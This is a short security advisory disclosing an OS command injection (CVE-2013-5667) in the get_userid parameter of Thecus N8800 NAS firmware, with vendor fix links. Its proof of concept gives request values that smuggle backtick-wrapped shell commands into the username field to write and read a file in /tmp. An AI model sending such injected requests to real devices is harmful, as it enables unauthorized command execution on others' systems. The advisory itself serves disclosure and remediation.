Advisory Information
Title: Thecus NAS Server get_userid OS Command Injection
Date published: 13 January 2014
Reference: CVE-2013-5667
Advisory Summary
A lack of input validation allows an attacker to execute OS commands directly on the operating system.
Vendor
Thecus <http://www.thecus.com/>
Affected Software
Thecus NAS Server N8800 Firmware 5.03.01
Description of Issue
The issue exists because the application accepts user input through the get_userid parameter that can be used to create OS commands that are redirected to the operating system. An attacker can use this flaw to execute arbitrary commands.
Proof of Concept
Standard request:
get_userid=1&username=admin
Response:
{"get_userid":"1001","groupname":false,"data":[]}
Command Injection PoC:
1. Write value for user admin to /tmp
get_userid=1&username=admin`echo+admin+>+/tmp/xpto`
2. Display value of /tmp
get_userid=1&username=`cat+/tmp/xpto`
Response:
{"get_userid":"1001","groupname":false,"data":[]}
Fix
ThecusOS 5 (32 bit):
http://www.thecus.com/Downloads/beta/FW/Thecus_NAS_FW_beta_5.03.02.4.rom
ThecusOS 5 (64 bit):
http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N2800_N4510U_N4800_N5550_N7510.rom
http://www.thecus.com/Downloads/beta/FW/64_V2.04.05_build7464_FW_N7700PROV2_N8800PROV2.rom